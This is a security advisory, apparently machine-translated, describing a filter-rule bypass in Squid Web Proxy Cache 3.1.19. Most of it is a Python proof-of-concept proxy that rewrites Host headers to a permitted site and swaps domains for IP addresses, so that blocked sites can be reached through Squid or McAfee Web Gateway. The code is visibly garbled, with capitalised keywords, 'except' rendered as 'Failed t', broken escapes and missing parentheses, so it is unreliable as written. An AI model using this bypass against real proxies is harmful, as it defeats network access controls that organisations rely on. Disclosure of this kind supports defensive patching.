Release date: 2012-04-16
Updated on: 2012-04-17
Affected Systems:
Squid Web Proxy Cache 3.1.19
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53024
Squid is an efficient Web Cache and proxy program. It was initially developed for the Unix platform and has been transplanted to Linux and most Unix systems, the latest Squid can run on Windows.
Squid Proxy has a security vulnerability in the implementation of filter rules. Successful attacks allow attackers to bypass certain security restrictions.
<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test methods:
Import socket, struct, sys, time
From threading import Thread
# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy get the Host field of the http header and do not verify anything else.
# It trusts on the HTTP Header and it can be modified by the attacker.
TimeOut = 0.8
IsGet = 0
HostNameG = ""
PacoteGet = ""
Port = 8080 # Listening port
ProxyAddr = "vulnerableProxy.com" # vulnerable proxy
ProxyPort = 8080 # proxy port
Def handle (client, globalSock ):
Client. settimeout (timeOut)
Global hostNameG
While 1:
Dados = ""
Tam = 0
While 1:
Try:
Dados2 = client. recv (1024)
Tam = tam + len (dados2)
Dados = dados + dados2
Failed t socket. timeout:
Break
Dd = dados. find ("CONNECT") # if the packet is a CONNECT METHOD
If dd! =-1:
Dd2 = dados. find (":")
HostName = dados [dd + 8: dd2]
IpAddr = socket. gethostbyname (hostName) # changing the method to connect to the ip address, not the dns domain
Pacote = dados
HostHeader = "Host:" + hostName
Pacote = pacote. replace (hostHeader, "Host: www.uol.com.br") # changing the host field with a value that is accepted by the proxy
Pacote = pacote. replace (hostName, ipAddr) # changind domain for ip
Dados = pacote
Getd = dados. find ("GET ")
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)
HostName = dados [getd2 + 2: getd3]
If getd! =-1:
GlobalSock. close ()
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)
Getd2 = dados. find ("//")
Getd3 = dados. find ("/", getd2 + 2)
HostName = dados [getd2 + 2: getd3]
ProxyAuth = ""
ProxyAuthN = dados. find ("Proxy-Authorization :")
If proxyAuthN! =-1:
ProxyAuthNN = dados. find ("\ r \ n", proxyAuthN)
ProxyAuth = dados [proxyAuthN: proxyAuthNN]
IpAddr = socket. gethostbyname (hostName)
Info = "CONNECT" + ipAddr + ": 80 HTTP/1.1 \ r \ n"
If proxyAuthN! =-1:
Info + = proxyAuth + "\ r \ n"
Info + = "Host: www.uol.com.br \ r \ n"
GlobalSock. send (info)
Tam = 0
Gdata = ""
While 1:
Try:
Gdata2 = globalSock. recv (1024)
Tam = tam + len (gdata2)
Gdata = gdata + gdata2
If len (gdata2) = 0:
Break
Failed t socket. timeout:
Break
GlobalSock. send (dados)
Tam = 0
Gdata = ""
While 1:
Try:
Gdata2 = globalSock. recv (1024)
If len (gdata2)> 0:
Client. send (gdata2)
Tam = tam + len (gdata2)
Gdata = gdata + gdata2
If len (gdata2) = 0:
Break
Failed t socket. timeout:
Break
Print 'proxy bypass'
Print 'by Gabriel Menezes Nunes'
Print 'Tested on McAfee Web Gateway 7 and Squid proxy'
Sockzao = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Print 'attacked Proxy :',
Print proxyAddr
Print 'listening on ',
Print port
Sockzao. bind ("", port ))
Sockzao. listen (6)
While 1:
Print 'Waiting for ONS ons'
Client, address = sockzao. accept ()
Print 'client connected'
Print address
GlobalSock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
GlobalSock. connect (proxyAddr, proxyPort ))
GlobalSock. settimeout (timeOut)
T = Thread (target = handle, args = (client, globalSock ,))
T. start ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Squid
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.squid-cache.org